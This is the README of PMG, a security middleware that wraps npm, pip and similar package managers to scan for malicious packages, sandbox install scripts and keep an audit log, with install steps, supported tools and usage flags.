Modern software development relies heavily on open-source packages. However, standard package managers (npm, pip, etc.) prioritize convenience over security, executing arbitrary code (like postinstall scripts) on your machine without validation. This vector is frequently exploited by attackers to steal credentials or inject backdoors.
PMG acts as a security middleware layer. It wraps your package manager to:
- Analyze packages for malware before they are installed.
- Sandbox the installation process to prevent system modification.
- Audit every package installation event.
Get protected in seconds.
MacOS / Linux (Homebrew)
brew install safedep/tap/pmgNPM
npm install -g @safedep/pmgSee Installation for additional methods.
Configure your shell to use PMG automatically.
pmg setup install
# Restart your terminal to apply changesContinue using your favorite package manager tools as usual. PMG works silently in the background.
npm install express
# or
pip install requestsIf a malicious package is detected, PMG blocks it immediately:
[PMG] Blocked malicious package: malicious-lib@1.0.0
[PMG] Reason: Known malware signature detected
| Feature | Description |
|---|---|
| Malicious Package Protection | Real-time protection against malicious packages using SafeDep. |
| Sandboxing | Enforces least privilege using OS native sandboxing to contain installation scripts. |
| Dependency Analysis | Deep scans of direct and transitive dependencies before they hit your disk. |
| Event Logging | Keeps a verifiable audit trail of all installed packages. |
| Zero Config | Works out of the box with sensible security defaults. |
| Cross-Shell | Seamlessly integrates with Zsh, Bash, Fish, and more. |
PMG supports the tools you already use:
| Ecosystem | Tools | Status | Command Example |
|---|---|---|---|
| Node.js | npm |
Yes | npm install <pkg> |
pnpm |
Yes | pnpm add <pkg> |
|
yarn |
Yes | yarn add <pkg> |
|
bun |
Yes | bun add <pkg> |
|
npx |
Yes | npx <pkg> |
|
pnpx |
Yes | pnpx <pkg> |
|
| Python | pip |
Yes | pip install <pkg> |
poetry |
Yes | poetry add <pkg> |
|
uv |
Yes | uv add <pkg> |
Homebrew (MacOS/Linux)
brew tap safedep/tap
brew install safedep/tap/pmgNPM (Cross-Platform)
npm install -g @safedep/pmgGo (Build from Source)
# Ensure $(go env GOPATH)/bin is in your $PATH
go install github.com/safedep/pmg@latestBinary Download
Download the latest binary for your platform from the Releases Page.
Security is our first class requirement. PMG builds are reproducible and signed.
- Attestations: GitHub and npm attestations are used to guarantee artifact integrity.
- Verification: Users can cryptographically prove the binary matches the source code.
- See Trusting PMG for verification steps.
PMG runs transparently, but you can control it when needed.
Treat all unverified or suspicious packages as malicious.
pmg --paranoid npm install <package>Simulate installation to check for malware without writing to disk.
pmg --dry-run npm install <package>Enable verbose logs for troubleshooting.
pmg --debug npm install <package>
⚠️ Warning: Bypassing security checks exposes users to risk.
export PMG_INSECURE_INSTALLATION=true
npm install <package>Contributions are welcome! Please see CONTRIBUTING.md for guidelines on how to build and test PMG locally.
PMG collects anonymous usage data to improve project stability and reliability.
To disable: export PMG_DISABLE_TELEMETRY=true.
![@devin-ai-integration[bot]](https://avatars.githubusercontent.com/in/811515?s=64&v=4){kind=small}
